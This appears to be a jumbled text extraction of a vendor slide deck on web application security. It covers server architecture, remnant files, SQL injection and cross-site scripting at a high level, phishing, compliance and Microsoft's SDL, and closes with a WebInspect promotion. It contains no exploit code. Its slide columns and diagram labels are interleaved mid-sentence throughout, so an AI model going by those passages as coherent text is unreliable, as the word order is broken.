Professional Documents
Culture Documents
SPI Labs
Research and development group
Recognized as leading authority on
web application security
Web Services
Application Database
Wireless Web Servers Server Server
Presentation Business Customer
Layer Logic Identification
Media Store Content Access
Browser Services Controls
Transaction
Information
Core Business
Data
HTTP(S)
Corporate
Inside
Firewall only Firewall only Firewall only
IMAP FTP allows PORT 80 allows allows application
SSH TELNET (or 443 SSL) applications server to talk to
POP3
traffic from the on the web database server.
Internet to the server to talk to
web server. application
server.
Any Web
Server: 80
Platform:
Known vulnerabilities can be
exploited immediately with a
minimum amount of skill or
experience script kiddies
Most easily defendable of all
Platform web vulnerabilities
Known MUST have streamlined
Vulnerabilities patching procedures
MUST have inventory process
Administration:
Less easily corrected than known
issues
Administration Require increased awareness
Extension Checking More than just configuration, must
Common File Checks be aware of security flaws in actual
Data Extension content
Checking
Backup Checking
Remnant files can reveal
applications and versions in use
Directory
Enumeration Backup files can reveal source code
Path Truncation and database connection strings
Hidden Web Paths
Forceful Browsing
Robots.txt
shows files that the administrator does not want
search engines to crawl
Dont show confidential information in this file
Remnant files
Remnant files are any files that are left on a web server that
are not in use or part of the web based application.
Remnant files can include backup files, documentation files,
default files (like samples) or any other file that is not part of
the production system.
Remnant files solutions
Never leave unnecessary files on a web server (i.e.
Web.config.old)
Assume all files on a web server will be seen by a hacker.
Encrypt secure information in configuration files
Application Programming:
Application
Common coding techniques do not
necessarily include security
Application Mapping
Input is assumed to be valid, but
Cookie Manipulation
not tested
Administration
Custom Application
Scripting Inappropriate file calls can reveal
Parameter Manipulation
source code and system files
Reverse Directory Unexamined input from a browser
Transversal can inject scripts into page for
Brute Force replay against later visitors
Application Mapping Unhandled error messages reveal
Cookie Poisoning/ Theft application and database structures
Buffer Overflow Unchecked database calls can be
SQL Injection
piggybacked with a hackers own
database call, giving direct access
Cross-site scripting
to business data through a web
browser
SPI Dynamics Confidential
SQL Injection
SQL Injection
Goal:
Pass a SQL command to the web based
application and have that command executed
on the database server
Use the exploit to steal data or damage/alter
the database.
Demo
Browser based
HTTP Based
Automated SQL Injection
Blind SQL Injection
TestSess
Site cookie
Seg
TestPerm
ProfileAddressVerified
ProfileID
MEMUSER
USERID
SESSIONUSERID
PROFILE
Source: www.wikipedia.org
SPI Dynamics Confidential
Phishing Defined
(source: www.antiphishing.org)
http://www.fakeserver.com http://www.nubank.com
Company X Security
Fix
Use the validateRequest=false cautiously
Server.HTMLEncode
1990s 2004
Zero Liability Federal Trade Commission
Regulatory requirements
GLB
HIPAA
SOX
CA1386
Legal precedents
Design Development
Production Testing
Security QA and
Operations Developers
and Auditors
Audit Development
Production QA
Security QA and
Operations Developers
and Auditors
Audit Development
Auditors, Dev, Developers
Compliance, and
Business Subject
Matter Experts
(SME)
Production QA
Security QA and
Operations Developers
and Auditors
People
Creating
Secure
Applications
Process/SDL Tools
Almost 40 percent of developers say that their companies do not think it is very
important to write secure applications
55
17
http://msdn.microsoft.com/security/sdl
Hard to guess
password!
String concat
Connecting for dynamic SQL
as sysadmin
Telling the
bad guy
too much on failure
People
Guidance
Training
Accountability
Process
Security is an evolving challenge
SDL process has proven effective at improving software security
As operating system security improves, attackers will move up the
stack
Be ready to meet the challenge
http://msdn.microsoft.com/security/sdl
Tools
People cannot find all the defects
Development
Secure development training
Develop secure applications
Testing applications in development
QA
Testing for security bugs
Production / Security
Validating systems are secure prior to going live
Audit
Continued validation of productions systems and processes
Establish remediation processes for production systems
Q&A
Break
WebInspect Demo
For a free 15 day trial of
WebInspect please visit
http://www.spidynamics.com